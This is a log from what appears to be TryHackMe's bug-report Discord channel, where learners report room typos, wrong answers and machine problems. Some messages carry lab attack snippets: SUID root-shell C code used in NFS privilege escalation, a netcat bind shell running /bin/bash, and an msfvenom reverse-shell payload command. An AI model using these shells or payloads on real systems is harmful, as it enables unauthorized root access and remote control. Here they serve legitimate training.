#room-bugs

1 messages Β· Page 2 of 1

quaint sparrow
#

I can scan it.

ashen obsidian
#

when i vim in the machine it hangs up and i cannot do anything

quaint sparrow
#

Can you do ip a s

#

And tell me how many tun* you have?

ashen obsidian
#

i have 1

#

i am checking writeups and my way is correct

#

but web server won't answer me on some directorys

ashen obsidian
flint plover
#

within the brainstorm buffer overflow room, in Task 1 Question 2 "How many ports are open" - The "correct" answer appears to be double the value of the real answer

peak carbon
#

Windows internal red teaming path doesn’t seem like the answer is working for task 7.

devout inlet
peak carbon
#

It won’t work either

peak carbon
#

4lL

#

Thus work tho

devout inlet
#

might need to steer clear of i's, 1's and l's next to eachother

peak carbon
#

Thanks mate

quaint sparrow
#

@gleaming shadow

gleaming shadow
#

thanks

wanton oyster
#

Hi, i don't know if im doing anything wrong but i am unable to start/restart the Apache2 webserver in the embedded Kali OS on the browser neither AttackTheBox

wanton oyster
#

Im kind of stupid heheheh xd

#

Thanks any way

flint spade
#

Hi in the "Walking An Application" room task 3 last question i found the flag "THM{CHANGE_DEFAULT_CREDENTIALS}" by following the previous steps but it doesnt work if someone know if i try the wrong flag or if it's a bug

quaint sparrow
flint spade
gusty peak
#

Hi, in this nmap room https://tryhackme.com/room/nmap03 a little more than half way down it says "On scenario where these three scan types can be efficient is when scanning a target behind a stateless.." I believe 'On' should read 'One' as in "One scenario where these three scan types can be efficient is when scanning a target behind a stateless.."

opaque river
#

I would like to report a room (not a bug) and I would also like to say that I have very little experience, so I might be wrong... hope I don't tho :)
I was doing the Linux Privilege Escalation room (https://tryhackme.com/room/linprivesc) and I was dealing with Task 11 "Privilege Escalation: NFS".
As the task said, on my machine, as root obv, I compiled the following C code that basically gives you a shell once executed on the target:

int main()
{
  setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Once compiled, I set the SUID bit (chmod +s shell) and all that remained to be done was to go
on the remote machine and run the SUID executable (since it was compiled in a network shared folder).
On the remote machine, once executed, a nice surprise awaited me:

   $ ./shell
     ./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell)

Later, after several searches, I understood the problem:
the remote machine had a different library (GLIBC_2.31) than the one on my machine (GLIBC_2.34).
I wasted something like an hour to figure out how to solve this problem.
The solution was to use static libraries (gcc -static code.c -o shell) so that my executable becomes
a kind of stand-alone and does not have to search for the library it needs in the remote machine.
It would have been nice to have at least a tip from the task (but perhaps the error was not foreseen?).

rugged canyon
#

you could always also copy the bash executable to said folder and mark that as owned by root and suid bit set to get a root shell but yeah this might need some looking into

eternal summit
opaque river
opaque river
eternal summit
#

I mean the target machine

opaque river
#

i was a normal user, not root

eternal summit
#

Add that from your box

#

You have write access to the share, you can add the bit once it's compiled.

opaque river
#

i think the target machine didn't have "gcc"

#

I think I tried

eternal summit
#

Possible, I'm just giving more solutions

opaque river
#

gotcha, thanks anyway. I wanted to report it so that maybe some clue about it is added :)

lone gate
#

at webosint you are saying that the correct answer is 4 but i can see more than 50 IP addresses for RepublicOfKoffee.com.

tacit sky
#

Room: Autopsy. Link: https://tryhackme.com/room/btautopsye0. Bug: Found in task 3, the explanation says the name of the case is Tryhackme, but the image says Sample Case. Nothing major, looks like a typo

#

thought it was worth pointing out, seems like smt easily overlooked

lone gate
gilded needle
quaint sparrow
gilded needle
old sandal
#

In room Splunk 101 (https://tryhackme.com/room/splunk101) Task9, the two links for BOTSv1 and BOTSv2 are broken. I guess they should point to the room Splunk 2 and Splunk 3? But the current links point to private/locked rooms.

brazen jolt
#

Hi, it's not really a "bug", but certainly the room 'overpass' got a bit easier to root since it's vulnerable to CVE-2021-4034. This made it a bit easier to root compared to intended manipulation of scheduled jobs.

eternal summit
weak gate
#

here it's missing a ")"

#

room: abusing windows internals

#

oh wait it's only the color that is wrong

brazen jolt
eternal summit
rugged canyon
#

@eternal summit ⬆️

misty cave
misty cave
#

And in task 6 load google_site_web should be modules load google_site_web

misty cave
molten needle
#

I'm getting the same, how did you resolve this?

eternal summit
#

Or were using the IP of their own machine instead of the target

devout inlet
#

Some wording in the new https://tryhackme.com/room/credharvesting room is a bit confusing. Specifically in the Local Windows Credentials section.
It doesn't specify how MSF uses in memory code injection.
Some simple fixes would be:

  • against the LSASS.exe process
  • to inject raw shellcode into the LSASS.exe process
  • to inject the LSASS.exe process
misty cave
dusky remnant
#

Under "Learn Cyber Security" Room, Task 2 site, "All on the same network" there is a grammatical error "to monitor stores' temperates "

true moon
#

OPSEC Room #Task 7 seems not working. I can't submit the sequence even in the right order (tried every combinations)

swift lotus
#

Takedown should be provisioning with subscriber tier resources, is currently unfinishable for free tier users due to how long it takes the services to spin up. Bumping to subscriber tier resources fixes this issue

covert field
distant talon
#

Not sure if room bug, but. Splunk 101 Task 7, "What is the highest EventID?" The answer isnt what the highest ID is but what ID has the most amount of events.

misty cave
swift lotus
#

@misty cave yep already heard from tim, a request has been put in for more resources πŸ‘

quaint sparrow
#

@dusky junco

dusky junco
#

-ban 630416104556068910 -ddays 1 nsfw discord invites

livid escarpBOT
#

πŸ”¨ Banned SWAMPY#2255 indefinitely

dusky junco
#

ty(: gone

hazy tiger
#

-ban 885158530619945071 -ddays 1 nsfw server

livid escarpBOT
#

πŸ”¨ Banned priyank#3344 indefinitely

tacit sky
fathom oar
#

Bro why is the agent sudo room refusing an ssh connection

fathom oar
#

I thought it's a bug

#

Cuz I have completed the room before

proven jasper
eternal summit
quaint sparrow
#

Or that's my opinion, rather

quaint sparrow
#

@dusky junco

torpid matrix
#

Is this a typo in the snort room? Should the sid description at the bottom say greater than 1,000,000? Got a picture but can't seem to upload one. πŸ˜…

quaint sparrow
#

You need to verify.

#

!docs verify

tropic flameBOT
inland wagon
#

In the Shodan.io section of the Passive Recon room (Jr. Pentester path), the answer to the first question (country with 2nd highest public Apache servers) is currently Japan. Germany, the answer according to the room is now 5th highest.

inland wagon
#

Task 6, 1st question

quaint sparrow
#

What did you search for?

#

Because when I search, Germany is second.

quaint sparrow
inland wagon
#

I searched Apache and clicked on the thing that said apache servers. It autocompleted to this search result, which is probably why the results were different. My bad

lime pumice
#

Not a real bug, only a very small mistake in a picture. But could maybe irritate some people, me included πŸ˜„
In the room https://tryhackme.com/room/dataxexfilt, in Task6 / Section: HTTP Tunnel. The first figure shows that app.thm.com is accessable from the internet and uploader.thm.com not, that should be the other way around as mentioned in the text above. I guess the labels for app.thm.com and upload.thm.com should be changed πŸ™‚

inland wagon
torpid matrix
#

Is this a typo in the snort room? Should the sid description at the bottom say greater than 1,000,000?

scenic heart
#

https://tryhackme.com/room/snort
TL:DR;
task 3, this question "According to the official description of the snort, what kind of NIPS is it?"
Please delete this.

longer;
task 3, this question "According to the official description of the snort, what kind of NIPS is it?"

So got a little bit of an issue with this question. The room does a great job of describing IPS/IDS stuff in task 3, but there is no mention of the types of NIPS.

Yeah, I get it, go read the "official description" of snort and you find the answer.

THing that bugs me is that the answer is just a description of NIPS. If it were truly a "type" of NIPS, what are the other types then?

Can you all straight up delete this question? Read the THM website forums and other people get stumped on this.

gusty peak
#

https://tryhackme.com/room/wireshark
Task 11 Questions 4: Looking at the data stream what is the full request URI from packet 18?

The data out of WireShark starts off with: http://pagead2.g... but the correct answer to the question is: https://pagead2.g

The answer seems to be wrong because https isn't covered until a later task.

torpid matrix
wanton oyster
#

Hi!

arctic jacinth
eternal summit
arctic jacinth
#

I've been maybe dumb to assume that the creds were given: "root:username". For ssh and mysql. But I didn't find any obvious one that works.
So now I start enumerate subdomains. But I don't feel like it s the goal of the exercise.

eternal summit
arctic jacinth
#

yes mysql task 9 ; but I already restart the box, as I thought the same

eternal summit
arctic jacinth
#
$ mysql -u root -p password -h 10.10.43.111
Enter password: 
ERROR 1049 (42000): Unknown database 'password'
eternal summit
#

It's trying to use password as the name of the database

#

-p doesn't take an argument

arctic jacinth
#

ok thx gonna dig the doc

arctic jacinth
livid escarpBOT
#

Gave +1 Rep to @eternal summit

rugged canyon
#

oh that explains why fonk got a problem.... was unsure what might have been the problem and did not feel like asking for details

arctic jacinth
rugged canyon
rugged canyon
#

@eternal summit ⬆️

#

@hazy tiger ⬆️

devout inlet
#

Question 2 & 3 in the LAPS section of the https://tryhackme.com/room/credharvesting room need to be switched. Currently you are asked to provide the LAPS password then the user that can read LAPS passwords but, in reality, you need to find the user first.
Please see the hints below as further evidence.

soft terrace
raw bison
#

-ban 602961821284040723 -ddays 1 Nitro Scam, if your account got compromised, secure it and appeal at bans@tryhackme.com

livid escarpBOT
#

πŸ”¨ Banned Angeless#8474 indefinitely

wanton oyster
#

Hi! In the redteam path im doing the Windows Persistence Room and I can't retrieve the flag9 form the 5th task of the room, i have repeat the whole process twice and i still don't get it
i was likely to think that it could be my fault but, the process seems prety simple to be my mistake two times so i think that something is wrong

#

Some one can help me to retrieve the flag?

eternal summit
devout inlet
#

@glad badger May I dm regarding content qa?

dusky junco
#

-ban 563684204295225355 -ddays 1 nsfw discord invite

livid escarpBOT
#

πŸ”¨ Banned LordOpal#4091 indefinitely

ornate axle
#

Good day,

I am working on "Red Team - Firewall Evasion v0.5" room, specifically "Task 8" which should be easy, but I am not successful.

So through the "Task 6" web browser I enter nc -nlvp 8081 -e /bin/bash
In the attack box terminal I enter nc -v [IP of task 6 machine] 8081 and I receive "Connection Refused".

Is this a bug or do I need to reboot my brainbox?

dawn tapir
#

Hello guys i have a probleme in the majority of the rooms , the images included in the room doesn't appear to me why i encounter this issue ?

sleek anvil
#

Hi guys, I finished a room yesterday (Introductory Networking) and I didn't receive any point, is it normal ? Ty

obsidian kiln
#

That's usually just tutorial rooms, especially if they have a tonne of questions.

sleek anvil
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

obsidian kiln
#

Just a case of answering a question and seeing if you get points

sleek anvil
obsidian kiln
#

Np πŸ™‚

unique frigate
#

Hello I just reached 7 streaks I can now start wreath but I encounter a problem : I can't answer questions on all tasks :

#

note that it is not the first time that this happen to me.

#

I really want to do this module

hazy tiger
unique frigate
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

placid abyss
#

2 gives no points

#

0 gives less points than 1

obsidian kiln
#

kekw That'll do it

#

Yes, you can pull a lot of info out of the API

cosmic plover
#

Hi guys, I'm have problem with room Gallery666, the privilege escaltion /opt/rootkit.sh not function, it's so, open nano /root/report.txt, press ^R ^X cannot open commando execution. More someone be the problem?

hazy tiger
bronze cave
#

Red Team Learning Path (coming soon)
Careers in Cyber, Task 8 ~ I think this needs to be updated.

eternal summit
#

-ban @toxic solar -ddays 1 Nitro Phishing. Secure your account and then email bans@tryhackme.com to appeal this ban.

livid escarpBOT
#

πŸ”¨ Banned heinhtet#1180 indefinitely

runic crown
#

Room:Windcorp Ra 1.1
and when i download spark_2_8_3.deb file using smbclient and tried installed using dpkg -i <installation file>
I get error as follows:

dpkg: regarding spark_2_8_3.deb containing spark-messenger, pre-dependency problem:
 spark-messenger pre-depends on openjdk-8-jre | oracle-java8-jre
  openjdk-8-jre is not installed.
  oracle-java8-jre is not installed.

dpkg: error processing archive spark_2_8_3.deb (--install):
 pre-dependency problem - not installing spark-messenger
Errors were encountered while processing:
 spark_2_8_3.deb

and when i try to debug it by installing it's pre-dependency openjdk-8-jre, oracle-java8-jre
I get errors as follows:

                                                                           ```

kali@kali:~/Downloads$ sudo apt install openjdk-8-jre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package openjdk-8-jre is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
nvidia-openjdk-8-jre

E: Package 'openjdk-8-jre' has no installation candidate

kali@kali:~/Downloads$ sudo apt install oracle-java8-jre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package oracle-java8-jre
```

#

i think the information provided is outdated

#

according to me above error makes the room unsolveable

eternal summit
runic crown
#

please guide me how to install old java as it has no installation candidate

#

sry i messaged you because we were common in three servers

#

could you tell me how would i install open jdk 8 jre

eternal summit
#

@runic crown This is not a room bug.
As Lassi said, if you're not familiar with installing software then this room is likely beyond you.
Please stop attempting to report this as a bug, it is categorically user error.

blazing stump
#

Room: Diamond model
Bug type: Typo
Location: Task 9 - Practice Analysis
Description: Please, deploy the static site attached to this tas should be task

#

Room: Diamond model
Bug type: Formatting
Location: Task 9 - Practice Analysis - View Site
Description: Bottom right selection in the diamond model, third option Microsoft's Adversary Recreation Model is not completely contained in the option box.

glad badger
livid escarpBOT
#

Gave +1 Rep to @blazing stump

runic crown
#

😒

knotty wave
#

so i completed the room but didnt " complete " the room according to the site and didnt earn the reward

#

any idea what i should do

#

this been for a while i just noticed it XD

steel thunder
#

I'm not sure whether this is a bug or intended behavior:
I'm currently in Wreath Task 14, in the question How would you forward 172.16.0.100:3306 to your own port 33060 using a chisel remote port forward, assuming your own IP is 172.16.0.200 and the listening port is 1337? Background this process. I made a typo in the answer, which just happened to be a . and the answer was still accepted. To test this I replaced the last two characters of my answer to the last question of Task 14 with .. and that answer got accepted too. Is this intended or some regex magic that is misbehaving?

#

ah the dots have been replaced with the correct characters now πŸ™‚, TIL

uncut cairn
#

Wrote a wrong answer and it got accepted as correct. (should have been 172.16.0.0/16 instead of 172.16.0.0/1)

rugged canyon
uncut cairn
rugged canyon
#

i.e you can typo an answer slightly and it will get accepted to not punish you with having to retype the whole thingy

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

no problem

wheat fractal
#

room: pyramidofpainax
poorly worded?? "A hash is not considered to be cryptographically secure if two files have the same hash value or digest."

wheat fractal
#

roo: powershell
Task is What is the location of the file "interesting-file.txt" but ||the file is actually named interesting-file.txt.txt|| in the vm

stray sage
#

Room: Sakura Room
Bug type: The answer is not updated.
Description:

The cherry room answers have not been updated. The following question in Task 5 should have changed the onion domain that is the answer.
  Q2:What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
[Details]
 The domain presented in the hint, depasteon6cqgrykzrgya52xglohg5ovyuyhte3117hzix7h5ldfqsyd.onion, does not exist. Instead, the site has been updated and the domain is http://deepv2w7p33xa4pwxzwi2ps4j62gfxpyp44ezjbmpttxz3owlsp4ljid.onion.

Also, the following problematic file from Task5 does not exist.
  Q3:What is the BSSID for the attacker's Home WiFi?
[Details]
  Please search and check the following The file that should be there does not exist.
http://deepv2w7p33xa4pwxzwi2ps4j62gfxpyp44ezjbmpttxz3owlsp4ljid.onion/show.php?md5=0a5c6e136a98a60b8a21643ce8c15a74 
grave burrow
#

room: Windows x64 Assembly
bug type: typo
desc: in task 6 the text says "DIV (unsigned) and IDIV (unsigned)", while IDIV is a signed opcode (text should be "IDIV (signed)")

nocturne stratus
#

https://tryhackme.com/room/btsysinternalssg task 9 has you run strings on zoomit.exe to get the path of the .pdb file the correct answer is to get the path for the 32 bit version but despite running the strings command on the 32 bit app it gives out the path to the 64 bit varitety thus you have to guess the right path or cheat with a writeup. Given the prevailance of 64 bit and that the vm were doing this on should have went ahead and used the 64 bit version as the correct answer

sleek sorrel
#

Hi guys! I have a problem with the Mustacchio machine. I tryed to connect hith ssh but i didn't have a correct passoword. Now I have a password and i geet a error code if i try to connect on: barry@10.10.92.187: Permission denied (publickey). How can I fix this problem? πŸ˜„

obsidian kiln
pastel torrent
#

Hey folks, I am having a hell of a time with OSF Lab02-Task 09. I am not able to find a file called "unknown1" anywhere on the VM. Any tips?

gusty lily
obsidian kiln
whole pumice
#

I have noticed sometimes the rooms are letting incorrect answers pass as correct. For example, the the question below in the Linux Fundamentals Part 1 room

whole pumice
# eternal summit This is answer tolerance

Are you saying it's a feature? I would have thought Answer Tolerance has its place, but in this instance I would call it a bug. Because it is teaching me via feedback something that is just incorrect.

eternal summit
#

Yes it's a feature.

#

It's not a great feature, it has flaws, but it's intentional

rugged canyon
#

so the wrong answer being there is not permanent

whole pumice
#

In linux fundamentals part 2: permissions 101, the task refers to a "cmnatic.pem" file, but the screenshot only shows "file1" and "file2".
(This is the right place to report this kind of thing right?)

marsh moat
#

this has happened a few times to me and i have no idea why. So when im doing a room and it has a machine start button i press it and launch it to work on the problems. however when going to the next room or even leaving the page entirely and coming back later it will not let me create or launch a new machine since it says that there are already the max running. Even though there is nothing running on my end. Any help with this?

quaint sparrow
#

Have you forgotten to close some past machines?

flat sparrow
#

Made it a habit to just close machines once I'm ready to deploy the next one

#

Rly easy to do as well

marsh moat
#

no, i normally close them once ive finished with them. but even if i did forget to close them, how would i even go about it? since its been a whole night of not doing the task and it still says that there are max machines

#

since i cant even progress until i can fix it, kinda bummed out aha

quaint sparrow
#

Use that link.

#

It will give you a list of running machines.

#

And as this isn't a room bug, if you need more help, please use #site-support

paper python
#

Does maybe the NetworkServices Room a problem with the ssh connection?(the SMB machine)

eternal summit
eternal summit
#

How much do you know about the history of this one? Nessus doesn't keep the answer stable

#

I think that'd be the best solution, and add a warning in the question

quaint sparrow
#

Will THM change it, or can Dark/Cake?

rugged canyon
#

@eternal summit ⬆️

eternal summit
#

-ban @surreal cedar -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

livid escarpBOT
#

πŸ”¨ Banned Pasindu99#6834 indefinitely

sinful crystal
#

looks like the browser history is gone from the machine in the room blaster

sinful crystal
#

okay

maiden dock
#

Good Day All,
In room Splunk 2 (splunk2gcd5) Task 5, question 2, regarding the season and episode. The file found shows S#E# in the filename but the answer is formatted as S##E## with no indication you need to add additional numbers to your answer.
I was only able to figure out adding the additional numbers from a question/answer here on discord.
Let me know if you need additional information and anything else from me.

maiden dock
#

In room AttacktiveDirectory, Task 5, question 2, regarding the Hashcat Examples Wiki, the wiki has the Hash-Name as "Kerberos 5, etype 23, AS-REP" vice what the answer will except "Kerberos 5 AS-REP etype 23"
I was only able to get this due to the Answer format pattern.

mighty meadow
#

hi you have 2 rooms both have same name
active directory basics

quaint sparrow
#

One is old, I think it's getting removed.

young fractal
#

I keep getting 500 Internal Server Error when I should just get a successful upload message in uploadvulns room is this normal?

celest summit
#

Hello on Advent of Cyber 2 [2020] Day 1 -- After reloading the page while connected, the website is forwarding me back to the login screen once cookie changed instead of just reloading panel page

paper python
#

Hello, in the principle of security room - task 4 - question 1 and 3 is the preview(astersik) of the answer false

eternal summit
paper python
eternal summit
#

Mark it as a spoiler if you want, but make sure you refresh the page first so it replaces the answer with the correct one as stored on the server

paper python
eternal summit
#

You've bumped into answer tolerance

#

Answer tolerance is not a bug

#

Answer tolerance is a feature to make your life easier

paper python
#

ah okay cool, I thought it is a bug, because in the text it was written with a space..

#

because in the text was ||The Bell-La Padula Modell|| but the answer was || The Bell-LaPadula Modell|| that was why I was so curious about it

maiden dock
#

Good day again All,
In room Disk Analysis & Autopsy (autopsy2ze0), Task 1, question 2, would it be better to say "computer name" vice "computer account name"?

raven tendon
#

Hi guys, I'm having a problem with https://tryhackme.com/room/chillhack room. Basically, there is a script inside the target that we need to run with sudo as user "apaar". The problem is that the script doesn't work for me.

#

Script output:

eternal summit
raven tendon
#

Ok and thanks for testing

mighty meadow
#

sometimes machines in room become unresponsive after u complete them atleast one time
it happens to me in Mr.robot room and Game zone

quaint sparrow
#

Which machine?

Target machine or attackbox?

dusky spindle
#

Ohhhh okay, that makes sense. I was fumbling a bit with the machine button on the top menu, yes.

#

Thanks!

eternal summit
#

-ban @dull ibex -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

livid escarpBOT
#

πŸ”¨ Banned Prabesh#6852 indefinitely

pallid vault
#

http://10.10.87.140/customers/reset will not load. This is on Authentication Bypass - Logic Flaw. Is anyone else having this issue? I can't complete the room without accessing this page. Tried loading on Chrome and Firefox.

long rapids
granite veldt
#

The recommended Docker image in the OpenVAS room needs at least two fixes inside the container to deal with issues in 2022. It may work for the purposes of the room, scanning with the included 2015ish era NVTs, but did lead me astray as being a viable option to deploy elsewhere (to be fair 97% of the internet agrees with THM on this being an easy recommendation)

This person apparently documented the two issues I had in one place (but both are issues on the mikesplain/openvas Docker github as well):

https://systemweakness.com/openvas-docker-container-setup-working-2022-all-nvts-200fbcb8bd9f?gi=1ef66c55a9d6

#

While this is not an option for the THM room since the NVTs need an hour or so to load on first boot, there's actually new official Docker Compose containers from Greenbone which are up to date, and worked fine for me deploying a bit wider than an example for a room.

https://greenbone.github.io/docs/latest/22.4/container/index.html

#

This is more of a heads up, rather than "please fix this", in case anyone else stumbles across this or searches. But may be good to update this room eventually

granite veldt
#

While I'm on this, some notes on Greenbone's guide if anyone actually reads the above lol:

  • Adding your user to docker group can be insecure as you basically get root equivalency from what I understand, just keep using sudo.
  • Echoing your password change in a command is not great, as many will forget and leave it in history, you can change the admin password inside of OpenVAS/GSA
maiden dock
#

In the Passive Reconnaissance room (passiverecon), Task5 question could have two answers. I image this due to a additional 5 letter sub-domain since this room was created/last updated.

eternal summit
granite veldt
#

Interesting, never heard of that before. Thanks!

mighty meadow
daring phoenix
#

On the last section before the conclusion of Further Nmap room, I am unable to access the machine. Have been waiting for more than 10 minutes as per the given note.

Didn't even got any response from the ping command I ran to the IP address.
I'm using AU-Regular-1 VPN config.

quaint sparrow
#

Are you on the VPN?

daring phoenix
#

yes I do

quaint sparrow
#

Can you check your VPN output?

daring phoenix
#

yes, it says... Initialization Sequence Completed

#

should I send you a screenshot?

quaint sparrow
#

Nah, It's ok.

#

Have you tried to do an Nmap scan?

daring phoenix
#

yes, it fails

sudo nmap -sX 10.10.176.239 -vv

quaint sparrow
#

Try adding -Pn

daring phoenix
#

okayy, lemme try

quaint sparrow
#

The room is definitely up and scannable. If you need more help, use room help/hints, as it's not a bug.

daring phoenix
#

ah okay i'm sorry. it worked with -Pn, i feel dumb

#

thanks anyway!

quaint sparrow
#

No worries πŸ˜„

vague tinsel
#

heey guys

#

anyone here for room NAX ?

surreal gull
#

Hi everyone!
Could someone please check if it is still possible to get an reverse shell on the "BRAINSTORM" box ?
The connection from the box is always dying on me even though the BOF exploit works fine on my Windows-VM.
[See screenshot for countless attempts]

raw bison
#

So what's the command you used ?

surreal gull
#

this one:
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.4.205 LPORT=8444 EXITFUNC=thread -a x86 --platform windows -b "\x00" -f c

surreal gull
tropic flameBOT
surreal gull
#

Didn do nuffin

#

I tried to change the vpn and tried the exploit again before that. Thats why the IP differs. But ye... no luck

#

Alright, I will try that. Ty πŸ™‚

livid escarpBOT
#

Gave +1 Rep to @vital vine

surreal gull
#

Caught the shell finally

#

I don't quite understand.
In order for me to reach thm - websites from boxes, I need to change the MTU to 1200 then it is working fine.
Now I can't catch a shell for the first time and the reason was that the MTU was too low apparently.
What should I do about this?

surreal gull
#

apparently 1400 aswell, that was the sweet spot for me

#

I did that but vpnscript didn't calculate that for me. It just told me 1500 is ok and 1200 is ok.

opal viper
# stray sage Room: Sakura Room Bug type: The answer is not updated. Description: ``` The che...

The website comes up and down. We had recent completions of the room using the depasteon6cqgrykzrgya52xglohg5ovyuyhte3117hzix7h5ldfqsyd[.]onion url.

EDIT: Looks like they indeed deprecated the other V3 URL. Will update.
EDIT 2: Updated the hint image and answer. In previous domain changes they kept the same hash, looks like when they switched to this new V3 domain they removed some old ones included ours. Please try now and reach out if it still doesn't work.

stray sage
livid escarpBOT
#

Gave +1 Rep to @opal viper

quaint sparrow
quaint sparrow
#

Enjoying the look of the new UI, some typos.

its should be it's

#

it's should be its

hot barn
modern raven
glad badger
livid escarpBOT
#

Gave +1 Rep to @modern raven

woeful bronze
#

Musical Stego room (https://tryhackme.com/room/musicalstego) has a problem with the second to last question I think. It says to use a github link instead of a pastebin link because it is down but i think the github link is down aswell.

wheat fractal
#

The holo network is not working properly it drops connection. And for some reason I can't bypass the anti virus I have tried the method mentioned in room and read some walkthrough and no method is working.

viscid wyvern
#

Hello, in Network Services Room, Task 6: when nmap scanning target machine, result is all ports are closed. When entering 0 into the answer of "how many ports are open" (and by the nature of subsequent questions) receive notice that this is incorrect. Have attempted reloading the page and starting both a new target machine from the specified task and a new attackbox - same result. Am I missing something, or is this a bug? https://tryhackme.com/room/networkservices#

viscid wyvern
#

Not yet, giving that a go now

quaint sparrow
viscid wyvern
#

You know what, I see my problem. Thanks for your help, and I'll make sure that the error is a bug next time I report. Sorry!

quaint sparrow
#

no worries πŸ˜„

You got there in the end.

terse jungle
#

https://tryhackme.com/room/kenobi room, Task 3 Q4: Answer must be 3 not 4.

meager dragon
#

Network Services skidy's Backdoor doesnt show up in nmap scan anymore : fingerprint matches too many ...error on both kali box and kali vpn

#

telnet isnt working properly either

keen flame
#

In room: Nmap Basic Port Scans in task: Fine-Tuning Scope and Performance i find: "For example, --max-rate 10 or --max-rate=10 ensures...." i think it should be min and max.

hazy tiger
#

-ban 499520043294654464 -ddays 1 scam

livid escarpBOT
#

πŸ”¨ Banned MeiTrix#0182 indefinitely

placid abyss
#

Task 3:

#

Should be a space between a and --help

eternal summit
#

-ban @analog glacier -ddays 1 Nitro phishing. Secure your account and then email bans@tryhackme.com to appeal this ban

livid escarpBOT
#

πŸ”¨ Banned th#8522 indefinitely

placid abyss
#

Not sure if I've overlooked something here, but in https://tryhackme.com/room/linuxfundamentalspart3 task 8 it wants you to read the apache2 logs, (/var/log/apache2/access.log) however the current user doesn't have permission to read the file so I'm not sure how we can actually answer the question

eternal summit
#

Look for one you can read

placid abyss
livid escarpBOT
#

Gave +1 Rep to @eternal summit

keen gate
#

The MITRE room, in section 3, says to use v8 of the TTP to answer the questions. The question, "What groups have used spear-phishing in their campaigns?" seems to have had its answer partially updated to reflect a more recent version.

dusky junco
#

your thinking in it being access.log is right - that is what it is intended to be, but the logs get rotated when you deploy the vm atm

small roost
livid escarpBOT
#

Gave +1 Rep to @hot barn

digital depot
keen gate
pulsar dust
#

I think I am running into a bug on the OWASP juicebox. I am completing things correctly, but I am not getting the flags back. Do I put that in here or elsewhere? In the meantime I can use a writeup, as I am happy that I am completing the tasks correctly, but wanted to run it by someone.

pulsar dust
#

turns out all the flags came through in a rush all at once like 20min later

dusky junco
hot barn
#

The conclusion of the Splunk room mentions two more rooms, one which is private and the other one just returns an error page.

placid abyss
livid escarpBOT
#

Gave +1 Rep to @dusky junco

exotic marlin
#

In the cyber defense pathway, Active Directory Basics is showing up as 'undefined' for me.

rugged canyon
#

oh... guess they forgot to make it link to the new active directory basics instead of the old one or something like that

keen gate
#

It was showing as undefined for me as well but worked fine when I clicked on it

placid abyss
#

Is there supposed to be an image here?

#

Just not in the actual room

quick violet
placid abyss
#

Task 7

quick violet
placid abyss
#

Didn't think that would affect it, huh

glad badger
livid escarpBOT
#

Gave +1 Rep to @exotic marlin

glad badger
somber garnet
#

I'm in the Musical Steganography challenge room and noticed first that there is a suggestion to complete the CCStego room first, but this room is private. Also the Github link in the hint does not exist anymore so there is no link at all to progress from task 4

EDIT: Pressed enter by accident πŸ˜…

maiden dock
#

Good Day All, In Python Basics, Task8, the provided 'bitcoin.py' script has a typo. It's currently numbered 1, 2, 2 instead of 1, 2, 3.

Also, is there a public facing page/repository that shows what bugs that have been reported on already and their status? Just curious as I like to help report things but don't want to duplicate reports that have already been reported and trying to search in all the rooms chat can get chaotic since there doesn't seem to been a standard format for reporting. If you need/want more information of my thoughts please let me know.

quaint sparrow
#

Just this channel only.

maiden dock
#

Would there be any interest of hearing a alternative solution to help better track and log them?

#

possibly some automation also

quaint sparrow
#

Possibly speak to a senior mod/Hydra/staff..

maiden dock
#

Should I pick anyone of them at random or a specific person/group here on discord? I don't want to bother/disturb anyone, or just bust in someone's DM's randomly.

brazen void
#

In the room "OSCP BOF Prep" from path "Offensive Pentesting" under the exploit python script it says "Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server" There is a grammar mistake which should be corrected to than not that

tawdry ember
gray drum
#

Task 1 for How Websites work seems to have the incorrect answer

quaint sparrow
gray drum
#

front end?

quaint sparrow
#

Your answer is wrong.

#

The number of * is a clue to how long the answer is, and the format.

gray drum
#

thanks, thought i tried client-side... maybe fat fingered it

quaint sparrow
#

More than likely the hyphen.

meager dragon
modest moat
#

Roomname: Sysinternals
Issue: I am unable to mount the sysinternals drive due to lack of internet access. it is unable to connect even after running the commands to enable webclient and webdiscovery

eternal summit
modest moat
#

ah, cause all the images and instructions are telling you to launch the tool from the mounted drive.

#

Thanks for clarifying

quick violet
#

@gleaming shadow

gleaming shadow
quick violet
icy elbow
#

-ban 432488466853527552 -ddays 1 posting shady links with shady scams for phishing

#

ree

livid escarpBOT
#

πŸ”¨ Banned 432488466853527552 indefinitely

placid abyss
placid abyss
rugged canyon
#

hmmmm

placid abyss
#

Funny, does the attackbox use an older version?

rugged canyon
#

ah yeah that sounds plausible

quaint sparrow
#

Yes.

If you take the wordlist from the Attackbox and use it on the VM it's the correct order.

somber garnet
quaint sparrow
somber garnet
dusky junco
#

-ban 725438344611495987 -ddays 1 spreading nitro scam/spam

livid escarpBOT
#

πŸ”¨ Banned simon.steeel#9498 indefinitely

visual island
#

Hey ! there is a mismatch in Room Sandbox Evasion Task 4, the first part talks about the sleep function but shows a code snip from checking domain cotroller

trail estuary
#

Hey guys I think I found an unintended solution on wonderland? its an old machine but I haven't been able to find any similar writeups anywhere?
How do I contact the room creator?

Thanks

eternal summit
trail estuary
eternal summit
#

You're only cheating yourself

worn flicker
#

Hello.
I was doing the Post-Exploitation Basics task 3: Enumeration w/ Bloodhound and got an "incompatible collector" error uploading loot.zip to bloodhound.

It seems the bloodhound on the attackbox is a newly updated version that doesn't support SharpHound.ps1 collected data anymore, as I was able to upload data collected by SharpHound.exe. (And read about this error online at https://github.com/BloodHoundAD/BloodHound/issues/516)

I just thought that the SharpHound.ps1 that was already on the victims machine should be changed to SharpHound.exe to avoid this problem.

solemn silo
#

should I report misspelling here if found?

worn flicker
solemn silo
#

asking in general

twin tapir
trail estuary
misty cave
barren bough
#

